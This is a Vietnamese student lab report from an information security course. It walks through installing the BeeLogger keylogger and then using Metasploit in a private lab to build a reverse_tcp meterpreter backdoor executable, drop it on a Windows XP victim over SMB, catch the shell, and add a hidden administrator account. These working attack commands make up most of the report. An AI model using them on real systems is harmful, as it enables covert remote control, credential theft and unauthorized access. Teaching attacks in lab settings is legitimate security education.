LAB 6: Malware | Báo cáo thực hành môn An toàn thông tin Trường đại học sư phạm kỹ thuật TP. Hồ Chí Minh

TRƯNG ĐI HC SƯ PHM K THUÂT TP.HCM
KHOA: CÔNG NGHỆ THÔNG TIN ---------- BÁO CÁO
MÔN HC: AN TÒAN THÔNG TIN LAB 6 MALWARE
GVHD: TS.Huỳnh Nguyên Chính
Sinh viên thực hiện: Nguyễn Lê Gia Hân MSSV: 21110432
Mã LHP: INSE330380_23_1_09
TP.Hồ Chí Minh, tháng 10 năm 2023 Lab 6. Malware 1. Keylogger
- Download zip file keylogger: https://github.com/4w4k3/BeeLogger
- Unzip: unzip BeeLogger-master.zip
- Chuyển cd vào folder: cd BeeLogger-master
- Cài đặt file: ./install.sh
+ Chuyển quyền root và tăng quyền cho install.sh + ./install.sh
- Khi cài đặt, nó sẽ tự cài đặt python - Run file: python bee.py
- Chọn K để tạo keylogger 2. Malware
PHẦN MỀM ĐỘC HI
Chuẩn bị hệ thống Tên Thiết bị Số lượng Ghi chú PC Win XP 1 Test (192.168.2.135) Backtrack 5 r3 1 Dùng cho Attacker (192.168.2.136) - Cài đặt IP trên window XP -
Cài đặt IP trên Backtrack 5r3
Bước 1: truy cập vào thư mục /pentest/exploits/framwork
#cd /pentest/exploits/framework
Bước 2: Đánh lệnh msfconsole #msfconsole
Bước 3: Tạo Virus có tên dev.exe
msf>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.136 LPORT=4444 X >/root/dev.exe
Bước 4: Thực hiện phát tán virus đến máy nạn nhân. -
Tạo folder SHARE trên máy nạn nhân - Bật sharing -
Máy atcker : vào smb để chuyển file sang máy nạn nhân Chuyển file thành công
Bước 5: Khai thác máy nạn nhân
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp set LHOST 192.168.2.136 set LPORT 4444 exploit
Sau khi nạn nhân chạy file dev.exe thu được backdoor  -
Xem các lệnh đang running: ps -
Tạo thư mục trên máy nạn nhân:
meterpreter> mkdir C:/yahana_21110432 -
Tạo user có quyền admin trên máy nạn nhân: meterpreter> shell net user GiaHan /add
net localgroup administrators GiaHan /add Trên máy nạn nhân